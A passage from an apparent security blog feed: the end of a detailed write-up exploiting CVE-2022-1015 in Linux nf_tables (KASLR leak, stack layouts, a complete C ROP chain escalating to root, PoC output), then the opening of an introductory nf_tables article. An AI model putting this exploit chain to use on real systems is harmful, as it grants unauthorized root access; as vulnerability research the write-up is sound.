      <li>offset = 8 (the UDP header is 8 bytes, we want to be writing right after it - where the payload is)</li>
      <li>len = 8 (the address is 8 bytes)</li>
    </ul>
  </li>
</ul>

<p>Those expressions make a rule that is added to the output chain. 
For the sake of reducing noise, I also added an expression of type <code class="language-plaintext highlighter-rouge">nft_cmp_expr</code> at the beginning of the rule to check the destination port before performing the other expressions. That would make sure we are not writing to some other UDP packet.</p>

<p>After we have set up the rule the only thing left is to spin up a UDP listener and send a UDP packet with an 8-byte payload - the address is going to be written over the 8-byte payload. Then we receive the packet and read the address from it.</p>

<p>Now that we have defeated <code class="language-plaintext highlighter-rouge">KASLR</code> it is time we move towards our goal - gaining kernel-space code execution and achieving Local Privilege Escalation.</p>

<h3 id="road-to-code-execution-">Road to Code Execution <a name="ceroad"></a></h3>
<p>Now that we have figured out how to leak the kernel address we need to figure out how to achieve Arbitrary Code Execution.</p>

<p>When we talked about primitives we established that <code class="language-plaintext highlighter-rouge">nft_payload</code> is the best expression for OOB write as we can write up to <code class="language-plaintext highlighter-rouge">0xff</code> bytes - 32 eight-byte words.</p>

<p>Ideally, we want to be able to write at least 20-something words on the stack without crashing. In reality, this is a bit more difficult than it seems.</p>

<h4 id="output-hook--udp-packet-">Output hook + UDP packet <a name="outputudp"></a></h4>
<p>Let us look more closely at the stack layout when using an output chain and a UDP packet. We found a <code class="language-plaintext highlighter-rouge">.text</code> address at a nice location there so maybe if it is a saved return address we could inject an ROP chain at that location.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb-peda$ x/40gx ($rsp+0x50+0x308)
0xffffc90000227cb8:     0x0000000000000000      0x0000000000000000
0xffffc90000227cc8:     0x0000000000000000      0x000000000100007f
0xffffc90000227cd8:     0x0000000000000000      0x00000000ffff0000
0xffffc90000227ce8:     0x0000000000000000      0x0000000100000001
0xffffc90000227cf8:     0x0011000000000000      0x0000000000000001
0xffffc90000227d08:     0x0000000000000000      0x0000000000000000
0xffffc90000227d18:     0x0100007f0100007f      0xffff8880699c55c3
0xffffc90000227d28:     0x0000000000000000      0x0000000000000000
0xffffc90000227d38:     0x000000100000ffff      0x0000000000000000
0xffffc90000227d48:     0x00008800ffff0000      0x0000000000000000
0xffffc90000227d58:     0x0000ee4700000000      0x0000000000000000
0xffffc90000227d68:     0xffff8880052d0480      0xffff8880052d0508
0xffffc90000227d78:     0x0000000000000008      0xffff8880052d0480
0xffffc90000227d88:     0x0000000000000004      0x0000000000000000
0xffffc90000227d98:     0xffffffff819bfc63      0xffff88800e233c00
0xffffc90000227da8:     0x3175125abbd91100      0xffff88800e233c00
0xffffc90000227db8:     0xffffc90000227df8      0xffff88800e233c00
0xffffc90000227dc8:     0x0000000000000010      0x0000000000000004
0xffffc90000227dd8:     0x0000000000000000      0xffffc90000227e28
0xffffc90000227de8:     0xffffffff819b7ab7      0xffffffff819b7ab7
</code></pre></div></div>

<p>Looking at the stack right after the address we leaked we see that at location <code class="language-plaintext highlighter-rouge">0xffffc90000227da8</code> there is an obvious stack canary.</p>

<p>We have <code class="language-plaintext highlighter-rouge">.text</code> addresses at <code class="language-plaintext highlighter-rouge">0xffffc90000227de8</code> and <code class="language-plaintext highlighter-rouge">0xffffc90000227df0</code>. Let’s look at what offsets they are. The first one is <code class="language-plaintext highlighter-rouge">0x438</code> bytes away from the start of nft_regs and the other one is <code class="language-plaintext highlighter-rouge">0x440</code>. That makes them outside of our OOB write range.</p>

<p>So obviously the <em>output hook</em> is not an option in our case.</p>

<h4 id="trying-the-other-hooks-">Trying the other hooks <a name="otherhooks"></a></h4>
<p>After it became obvious that the <strong>output hook</strong> cannot be used on this kernel built I started looking into other hooks. I tried the <strong>input hook</strong>, <strong>prerouting hook</strong>, <strong>postrouting hook</strong> - all without the <strong>ingress</strong> and <strong>forward</strong> hooks. After reviewing the stack on all of them I realised none of them have a favourable stack layout (using UDP packets). This was quite disappointing as I had invested a lot of time attempting to do it using UDP packets on the different hooks.</p>

<p>On the <strong>prerouting hook</strong> I even attempted to split the ROP chain around the stack canary and jump between the <em>two</em> ROP chains - but that also did not work as I could not pass the validation while keeping the length low enough as to not overwrite the stack canary.</p>

<p>After having spent a lot more time than I should have trying to make it work on one of the hooks I decided to look into the stack layout when TCP packets go through the rules.</p>

<h4 id="exploitation-vector-through-tcp-">Exploitation vector through TCP <a name="expltcp"></a></h4>
<p>One of the reasons I worked so hard to make it work with UDP rather than attempting TCP earlier was because TCP requires a connection to be initiated and that is an extra burden we have to deal with.</p>

<p>Another reason I had to avoid TCP is the fact that the stack might differ between different TCP packets due to different flags being set in their headers. And indeed I observed this behaviour. It could also be viewed as a positive rather than a negative - the more different stack layouts we can get the better the chance that one might be exploitable.</p>

<p>First I attempted of course the output hook. I used a normal <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> socket. Debugging I realised that the stack layout when sending a data packet is not favourable. However, I saw something very interesting… The stack layout looked favourable when the <strong>ACKnowledgement</strong> packet of the connection initialization was being handled.</p>

<p>Now the obvious next step is to include the payload in the <strong>ACK</strong> packet that is sent during initialization. To do that I had to use <strong>raw sockets</strong> and build manually the headers for the <strong>SYN</strong> and <strong>ACK</strong> packet. That allowed me to include a payload to the <strong>ACK</strong> packet where I wouldn’t be able to do that via a <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> socket.</p>

<p>Weirdly the stack layout changed when using a raw socket - it did not look as it did when I was using a normal <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> socket. That was weird… however it wasn’t an obstacle as the new stack layout was also vulnerable. Let’s take a look at it.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb-peda$ x/42gx ($rsp+0x50+0x308)
0xffffc90000237d78:     0x0000000000000001      0xffffea0000086d40
0xffffc90000237d88:     0x0000000000000000      0x0000000000000000
0xffffc90000237d98:     0x0000000000000000      0x0000000000000000
0xffffc90000237da8:     0x885b22be57fdfb00      0xffff88800e266e00
0xffffc90000237db8:     0xffffc90000237df8      0xffff88800e266e00
0xffffc90000237dc8:     0x0000000000000010      0x0000000000000006
0xffffc90000237dd8:     0x0000000000000000      0xffffc90000237e28
0xffffc90000237de8:     0xffffffff819b7ab7      0xffffffff819b7ab7
0xffffc90000237df8:     0x0000000000000000      0x00007f1e7f701df0
0xffffc90000237e08:     0xffffffff819b99c8      0x0000000100000000
0xffffc90000237e18:     0x00007f1e78002bc0      0x00000000000000f4
0xffffc90000237e28:     0xffffc90000237e88      0xffff888000000010
0xffffc90000237e38:     0x0000000000000005      0x0000000000000000
0xffffc90000237e48:     0x0000000000000000      0xffffc90000237e28
0xffffc90000237e58:     0x0000000000000000      0x0000000000000000
0xffffc90000237e68:     0x0000000000000255      0x0000000000000000
0xffffc90000237e78:     0x0000000000000000      0x00007f1e78003bc8
0xffffc90000237e88:     0x0100007f56c30002      0x0000000000403f1c
0xffffc90000237e98:     0xffffffff812b14d5      0x0000000000000255
0xffffc90000237ea8:     0x0000000000000006      0xffffc90000237f58
0xffffc90000237eb8:     0x00007f1e78003bc8      0xffff888003e33300
</code></pre></div></div>

<p>As you can see there are two <code class="language-plaintext highlighter-rouge">.text</code> addresses at the addresses <code class="language-plaintext highlighter-rouge">0xffffc90000237de8</code> and <code class="language-plaintext highlighter-rouge">0xffffc90000237df0</code>. After debugging a little it became clear that the second one is a <strong>saved return address</strong>. There is also no stack cookie after it in near view.</p>

<p>That address is at offset <code class="language-plaintext highlighter-rouge">0x390</code> from the beginning of <code class="language-plaintext highlighter-rouge">nft_regs</code>. That is in-bounds of our <code class="language-plaintext highlighter-rouge">nft_payload_set</code> OOB write.</p>

<p>Our upper bound for the OOB write is <code class="language-plaintext highlighter-rouge">0x450</code>. That leaves us with the ability to write <code class="language-plaintext highlighter-rouge">0xc0 = 192</code> bytes on the stack. That is 28 words. Should be more than enough for a full ROP chain.</p>

<h3 id="building-an-rop-chain-">Building an ROP chain <a name="ropchain"></a></h3>
<p>Now that we have the payload injection sorted it is time we start building an ROP chain.
Our ROP chain could be split into three stages - preparing credentials, leaving the namespace sandbox and returning to userland.</p>

<p>First, we need to setup up our kernel credentials.</p>

<h4 id="prepare_kernel_cred-">prepare_kernel_cred <a name="prepare_kernel_cred"></a></h4>
<p>We need to call <code class="language-plaintext highlighter-rouge">prepare_kernel_cred</code> passing <em>NULL</em> as the argument. If <em>NULL</em> is supplied then the credentials will be set to 0 with no groups, full capabilities and no keys.</p>

<p>In order to do that it would require we know the address of <code class="language-plaintext highlighter-rouge">prepare_kernel_cred</code>. On my kernel build it is located at offset <code class="language-plaintext highlighter-rouge">0x108aa0</code> from the kernel base address. According to the <code class="language-plaintext highlighter-rouge">x86_64</code> convention to set the first argument we need to set the <code class="language-plaintext highlighter-rouge">rdi</code> register.</p>

<p><img src="https://i.imgur.com/ozIaAxw.png" alt="convention.jpg" /></p>

<p>So we need just a single gadget here - to pop <em>rdi</em>. The return value of the <code class="language-plaintext highlighter-rouge">prepare_kernel_cred</code> function would of course be saved in the <em>rax</em> register as per the <a href="https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit">convention</a>.</p>

<p>In total for the prepare_kernel_cred part we would need to pass 3 words.</p>

<p>I found a suitable gadget to pop the <code class="language-plaintext highlighter-rouge">rdi</code> register - <code class="language-plaintext highlighter-rouge">0xffffffff81004616 : pop rdi ; ret</code>.
So the offset from the kernel base would be <code class="language-plaintext highlighter-rouge">0x004616</code>.</p>

<h4 id="commit_creds-">commit_creds <a name="commit_creds"></a></h4>
<p>After we have prepared the credentials we need to actually install them upon the current task. To do that we need to call <code class="language-plaintext highlighter-rouge">commit_creds</code>.</p>

<p>We have the credentials in the <code class="language-plaintext highlighter-rouge">rax</code> register. However, we need to pass them to the <code class="language-plaintext highlighter-rouge">commit_creds</code> function. To do that we need to move the <code class="language-plaintext highlighter-rouge">rax</code> register to the <code class="language-plaintext highlighter-rouge">rdi</code> register. The function is located at offset <code class="language-plaintext highlighter-rouge">0x108870</code> from the kernel base. To move <code class="language-plaintext highlighter-rouge">rax</code> to <code class="language-plaintext highlighter-rouge">rdi</code> need a <code class="language-plaintext highlighter-rouge">mov rdi, rax</code> gadget. That means that it would take only 2 words to call <code class="language-plaintext highlighter-rouge">commit_creds</code>.</p>

<p>There is one small problem though. There is no <code class="language-plaintext highlighter-rouge">mov rdi, rax ; ret</code> gadget. The best I could find was the following</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0xffffffff81020b1d : mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret
</code></pre></div></div>
<p>It is at offset <code class="language-plaintext highlighter-rouge">0x020b1d</code> from the kernel base.
The gadget requires us to pass one dummy value for the <code class="language-plaintext highlighter-rouge">rbx</code> register.
That would bring the total size of this stage of the ROP chain to 3 words.</p>

<h4 id="switch_task_namespaces-">switch_task_namespaces <a name="switch_task_namespaces"></a></h4>
<p>To exploit this vulnerability we needed the capability <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code>. We gained it by putting our process in a sandbox - with a user+network namespace. Now it is time to escape our sandbox and leave the namespace.</p>

<p>To do this we are going to use <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code>. On my build, the entry of that function is at offset <code class="language-plaintext highlighter-rouge">0x107030</code> from the kernel base.</p>

<p>We have to pass two things to the function - the task whose namespaces we want to switch and the <code class="language-plaintext highlighter-rouge">struct nsproxy</code> that holds the namespaces that we are switching to.</p>

<p>We are going to find the task of our process by passing its <strong>pid</strong> to <code class="language-plaintext highlighter-rouge">find_task_by_vpid</code>. That would return a pointer to a <code class="language-plaintext highlighter-rouge">task_struct</code>. This pointer is our first argument to <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code>.</p>

<p>The structure <code class="language-plaintext highlighter-rouge">nsproxy</code> contains pointers to all (net, mnt, pid, cgroup, etc) per-process namespaces. It esentially defines what namespaces a process uses. Every time a namespace of a process is changed it copies the existing nsproxy and modifies it. So all nsproxy instances can be thought of as modifications of an initial one - that of the <code class="language-plaintext highlighter-rouge">init</code> process. The initial nsproxy can be accessed with <code class="language-plaintext highlighter-rouge">init_nsproxy</code>. It is the second argument we pass to <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code>.</p>

<p>Let’s actually see gadgets will be needed to do all of this and how many words we are going to need for this part.</p>

<p>We need 3 words to get the pointer to the <code class="language-plaintext highlighter-rouge">task_struct</code>. One gadget to pop rdi, a word to actually pass the <strong>pid</strong> of our process and one word to call <code class="language-plaintext highlighter-rouge">find_task_by_vpid</code>.</p>

<p>To call <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code> we would need 5 words. We use a gadget that performs <code class="language-plaintext highlighter-rouge">mov rdi, rax</code> - because rax holds the pointer to the <code class="language-plaintext highlighter-rouge">task_struct</code> and we want to pass it as a first argument. However, the gadget that I am using has an unnecessary <code class="language-plaintext highlighter-rouge">pop</code> in it therefore I need to pass one dummy register. That brings it to two words so far. I need two more words to pass <code class="language-plaintext highlighter-rouge">init_nsproxy</code> as a second argument - one for the <code class="language-plaintext highlighter-rouge">pop rsi</code> gadget and one for the address of <code class="language-plaintext highlighter-rouge">init_nsproxy</code>. And finally, I need a 5th word to call <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code>.</p>

<p>In total this stage would require 8 words.</p>

<h4 id="swapgs_restore_regs_and_return_to_usermode-">swapgs_restore_regs_and_return_to_usermode <a name="swapgs"></a></h4>
<p>Now that we have set up our credentials it is time to return execution to usermode. To do that we are going to use a this function as a <code class="language-plaintext highlighter-rouge">KPTI trampoline</code>. But why do we need to use a <em>trampoline</em>?</p>

<p>Well we need to swap our GS register. The GS register in the Linux Kernel is used for per-CPU data structures. We need to swap it as we are moving from kernel-space to user-space.</p>

<p>We also need to swap the page tables to the userland ones. That is due to the <code class="language-plaintext highlighter-rouge">Kernel Page Table Isolation</code> feature. It separates user-space and kernel-space page tables - from user-space you can see only user-space pages and minimal kernel-space mappings. From kernel-space however you can see both user-space and kernel-space pages but the user-space pages are not executable. That means that if we don’t swap the page tables we cannot return execution to a function from user-space.</p>

<p>The function <code class="language-plaintext highlighter-rouge">swapgs_restore_regs_and_return_to_usermode</code> is called a <strong>KPTI trampoline</strong> because it swaps the GS register for us, changes the page tables and allows us to pass an IRET frame (Interrupt Return frame). Using the IRET frame we can set the Stack Segment (SS) register, the Stack Pointer (RSP), the RFLAGS register, the Code Segment (CS) register and most importantly - the instruction pointer (RIP).</p>

<p>As the RIP we pass a pointer to a function that will spawn a shell. The rest of the registers we can can save before we send the payload and just return the registers to the same values they had before we entered kernel-space.</p>

<p>Let’s take a look at the generated assembly of the <code class="language-plaintext highlighter-rouge">swapgs_restore_regs_and_return_to_usermode</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0xffffffff81e00ff0 &lt;+0&gt;:     pop    r15
0xffffffff81e00ff2 &lt;+2&gt;:     pop    r14
0xffffffff81e00ff4 &lt;+4&gt;:     pop    r13
0xffffffff81e00ff6 &lt;+6&gt;:     pop    r12
0xffffffff81e00ff8 &lt;+8&gt;:     pop    rbp
0xffffffff81e00ff9 &lt;+9&gt;:     pop    rbx
0xffffffff81e00ffa &lt;+10&gt;:    pop    r11
0xffffffff81e00ffc &lt;+12&gt;:    pop    r10
0xffffffff81e00ffe &lt;+14&gt;:    pop    r9
0xffffffff81e01000 &lt;+16&gt;:    pop    r8
0xffffffff81e01002 &lt;+18&gt;:    pop    rax
0xffffffff81e01003 &lt;+19&gt;:    pop    rcx
0xffffffff81e01004 &lt;+20&gt;:    pop    rdx
0xffffffff81e01005 &lt;+21&gt;:    pop    rsi
0xffffffff81e01006 &lt;+22&gt;:    mov    rdi,rsp
0xffffffff81e01009 &lt;+25&gt;:    mov    rsp,QWORD PTR gs:0x6004
0xffffffff81e01012 &lt;+34&gt;:    push   QWORD PTR [rdi+0x30]
0xffffffff81e01015 &lt;+37&gt;:    push   QWORD PTR [rdi+0x28]
0xffffffff81e01018 &lt;+40&gt;:    push   QWORD PTR [rdi+0x20]
0xffffffff81e0101b &lt;+43&gt;:    push   QWORD PTR [rdi+0x18]
0xffffffff81e0101e &lt;+46&gt;:    push   QWORD PTR [rdi+0x10]
0xffffffff81e01021 &lt;+49&gt;:    push   QWORD PTR [rdi]
...
0xffffffff81e01069 &lt;+121&gt;:   pop    rax
0xffffffff81e0106a &lt;+122&gt;:   pop    rdi
0xffffffff81e0106b &lt;+123&gt;:   swapgs
...
</code></pre></div></div>
<p>Looking at the generated assembly we see that we pop a lot of register at the start. We wouldn’t want to pass that many dummy values in the ROP chain so we are going to actually call the function at offset <code class="language-plaintext highlighter-rouge">&lt;+22&gt;</code> where the first move function starts. However, we will still have to pass two dummy values for the pop instructions at <code class="language-plaintext highlighter-rouge">&lt;+122&gt;</code> and <code class="language-plaintext highlighter-rouge">&lt;+123&gt;</code>.</p>

<p>The order of the registers that we pass to the IRET frame should be <code class="language-plaintext highlighter-rouge">RIP CS RFLAGS SP SS</code></p>

<p>So in total, this part of the ROP chain would take us:</p>
<ul>
  <li>1 word to pass the address of <code class="language-plaintext highlighter-rouge">swapgs_restore_regs_and_return_to_usermode+22</code></li>
  <li>2 dummy words for <code class="language-plaintext highlighter-rouge">rax</code> and <code class="language-plaintext highlighter-rouge">rdi</code></li>
  <li>5 words for the IRET frame.</li>
</ul>

<p>In total 8 words.</p>

<h4 id="summarizing-the-rop-chain-">Summarizing the ROP chain <a name="summ"></a></h4>
<p>The total size of the ROP chain in my case is 23 words. The size will differ between builds due to gadget differences, etc.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="c1">// clearing interrupts</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">cli_ret</span><span class="p">;</span>

<span class="c1">// preparing credentials</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">pop_rdi_ret</span><span class="p">;</span> 
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// first argument of prepare_kernel_cred</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">prepare_kernel_cred</span><span class="p">;</span>

<span class="c1">// commiting credentials</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">mov_rdi_rax_pop_rbx_ret</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// dummy rbx</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">commit_creds</span><span class="p">;</span>

<span class="c1">// switching namespaces</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">pop_rdi_ret</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">process_id</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">find_task_by_vpid</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">mov_rdi_rax_pop_rbx_ret</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// dummy rbx</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span>	<span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">pop_rsi_ret</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">init_nsproxy</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">switch_task_namespaces</span><span class="p">;</span>

<span class="c1">// returning to userland</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">swapgs_restore_regs_and_return_to_usermode</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// dummy rax</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// dummy rdi</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">spawnShell</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_cs</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_rflags</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_sp</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_ss</span><span class="p">;</span>
</code></pre></div></div>

<p>This is the complete ROP chain.</p>

<h2 id="proof-of-concept-">Proof-of-Concept <a name="poc"></a></h2>
<p>The PoC is available at <a href="https://github.com/ysanatomic/CVE-2022-1015">https://github.com/ysanatomic/CVE-2022-1015</a>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># ./exploit
[*] CVE-2022-1015 LPE Exploit by @YordanStoychev

uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
[*] Setting up user+network namespace sandbox

[+] STAGE 1: KASLR bypass 
[*] Socket is opened.
[*] Table leak_table created.
[*] Chain output_chain created.
[*] Bitwise expression is setup!
[*] Payload expression is setup!
[*] Verdict is setup!
[*] Address leak rule created!
[*] Packet sent... if no output in a second - it has failed
[*] Listening on port 50005
[&amp;] Leaked Address: 0xffffffff819bfc63
[&amp;] Kernel base address: 0xffffffff81000000

[+] STAGE 2: Escalation
[*] Socket is opened.
[*] Table rop_table created.
[*] Chain output_chain created.
[*] Copy ROP-to-Stack rules created.
[*] Saved userland registers
[#] cs: 0x33
[#] ss: 0x2b
[#] rsp: 0x7ffd969d1da0
[#] rflags: 0x246

[*] TCP Listener and client threads created!
[+] TCP server socket created.
[+] Bind to the port number: 50006
[*] Listening...
[*] Successfully sent 60 bytes SYN!
[*] Successfully received 48 bytes SYN-ACK!
[*] Sending an ACK packet with the payload...
[***] Exploit ran successfully
uid=0(root) gid=0(root)
#
</code></pre></div></div>

<h2 id="closing-remarks-">Closing Remarks <a name="closing"></a></h2>
<p>This vulnerability was extremely interesting to re-discover. The nf_tables codebase seems complicated at first but remarkably simple when you know your way around.</p>

<p>The exploitation stage can be described as a big dose of educational fun even if frustrating at times - especially while hunting for a good hook where the stack is favourable to exploitation.</p>

<p>Massive thanks to <a href="https://twitter.com/pqlqpql">David Bouman</a>. His write-up was very educational - especially the overview of nf_tables that kick-started my research.</p>

<p>I hope this write-up was as much fun to read as it was for me to write it.</p>

<p>Feel free to contact me on Twitter or via email if you have any questions.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Incorrect validation in nf_tables allows for Out-of-Bounds Read and Write]]></summary></entry><entry><title type="html">Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables</title><link href="/netfilter_nf_tables/" rel="alternate" type="text/html" title="Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables" /><published>2022-11-01T12:00:00+00:00</published><updated>2022-11-01T12:00:00+00:00</updated><id>/nftables</id><content type="html" xml:base="/netfilter_nf_tables/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>Hello there!</p>

<p>This is an introduction to Netfilter’s nf_tables. While it isn’t a complete study of the internals it can give you a solid base before you start your own research into the module. Or maybe you have experience using tools like <strong>iptables</strong> and <strong>nft</strong> and want to see what happens behind the curtain - this article is for you as well.</p>

<p>While I have tried to make it as accessible as possible the article assumes basic knowledge of <strong>C</strong> and the <strong>Linux Kernel</strong>.</p>

<h3 id="table-of-contents">Table of Contents</h3>
<ol>
  <li><a href="#whatis">What is Netfilter and nf_tables?</a></li>
  <li><a href="#parts">Building Blocks of the Firewall</a>
    <ul>
      <li><a href="#rules">Rules</a></li>
      <li><a href="#chains">Chains</a></li>
      <li><a href="#tables">Tables</a></li>
      <li><a href="#expressions">Expressions</a></li>
    </ul>
  </li>
  <li><a href="#registers">Registers</a>
    <ul>
      <li><a href="#dataregs">Data registers</a></li>
      <li><a href="#verdictreg">Verdict register and codes</a></li>
    </ul>
  </li>
  <li><a href="#quicklook">Taking a quick look at nft_do_chain</a></li>
  <li><a href="#expressions2">Expressions</a>
    <ul>
      <li><a href="#nft_immediate_expr">nft_immediate_expr</a></li>
      <li><a href="#nft_payload">nft_payload</a></li>
      <li><a href="#nft_payload_set">nft_payload_set</a></li>
      <li><a href="#nft_cmp_expr">nft_cmp_expr</a></li>
      <li><a href="#nft_bitwise">nft_bitwise</a></li>
      <li><a href="#nft_meta">nft_meta</a></li>
      <li><a href="#nft_byteorder">nft_byteorder</a></li>
      <li><a href="#nft_range_expr">nft_range_expr</a></li>
      <li><a href="#example">An example</a></li>
    </ul>
  </li>
  <li><a href="#hooks">Netfilter Hooks</a></li>
  <li><a href="#libraries">The Libraries - libnftnl and libmnl</a>
    <ul>
      <li><a href="#libmnl">libmnl</a></li>
      <li><a href="#libnftnl">libnftnl</a></li>
    </ul>
  </li>
  <li><a href="#closing">Closing remarks and acknowledgements</a></li>
</ol>

<h2 id="what-is-netfilter-and-nf_tables-">What is Netfilter and nf_tables? <a name="whatis"></a></h2>
<p>Netfilter is a framework in the Linux Kernel. It allows various network operations to be implemented in the form of <em>handlers</em> via <strong>hooks</strong>. It could be used for filtering, <em>Network Address Translation</em> or <em>port translation</em>. 
In general it could be summarized as a framework allowing you to <strong>direct, modify and control</strong> the network flow in a network.</p>

<p>Many <strong>userspace programs</strong> use netfilter. The most common perhaps is <strong>iptables</strong>.</p>

<p>The subsystem we will be reviewing is nf_tables. It is responsible for filtering and rerouting packets. It is commonly used for building <em>firewalls</em> as you can create complex rules through which to decide what happens with traffic - if it has to be refused, redirected, modified or accepted.</p>

<p>You can also write your own <strong>userspace programs</strong> that use the nf_tables subsystem. For that use a library has been developed that <strong>significantly</strong> simplifies the process - <em>libnftnl</em> (that requires the library <em>libmnl</em>). More on that later.</p>
<blockquote>
  <p>Note: libmnl and libnftnl also simplify the development of exploits targeting nf_tables :D</p>
</blockquote>

<h2 id="build-a-table-assemble-a-chain-form-rules-and-decide-on-expressions-">Build a table, assemble a chain, form rules and decide on expressions <a name="parts"></a></h2>
<p>When we talk about netfilter internals we will constantly mention <strong>expressions</strong> used in <strong>rules</strong> which form <strong>chains</strong> that are part of <strong>tables</strong>. 
That might sound a little bit intimidating but don’t worry we will go over everything.</p>

<h3 id="rules--">Rules  <a name="rules"></a></h3>
<p>Rules are essentially defined perfectly by their name. They are rules by which packets are filtered. Rules like checking the protocol, the source, the destination, the port, etc. Rules have a <strong>verdict</strong> - you can decide if you want to drop the packet, reject it or just accept it and go down the <strong>chain</strong> of rules.</p>

<blockquote>
  <p>Example: “udp dport 50001 drop” If the protocol is UDP <strong>and</strong> the destination port is 50001 it will drop the packet.</p>
</blockquote>

<p>In the future when we talk about a rule being “executed” we essentially mean that the packet going through is being evaluated against the rule to determine if the packet fits the rule or not.</p>

<h3 id="chains--">Chains  <a name="chains"></a></h3>
<p>Chains are essentially linear structures of rules. After one rule is checked it goes to the next one. Sometimes the verdict might make the execution jump to another chain. However we always have a <em>base chain</em>. 
A base chain is where the execution begins from. If there is a rule that checks if the protocol is <code class="language-plaintext highlighter-rouge">UDP</code> you can make it so that the execution jumps to another chain that has just rules for <code class="language-plaintext highlighter-rouge">UDP</code> packets.</p>

<p>Execution always begins from a base chain because they are the chains attached to a <strong>netfilter hook</strong>. We will talk extensively about hooks later but they essentially show when a chain should be executed. If an input hook is being used then the chain will be executed against incoming packets - if an output hook - against outgoing packets.</p>

<h3 id="tables--">Tables  <a name="tables"></a></h3>
<p>Tables are the top-level structures. They contain the chains. Chains can only jump to another chain on the same table.</p>

<p>Tables belong to a particular family. The family defines what type of packets will be handled by the chains in the table.
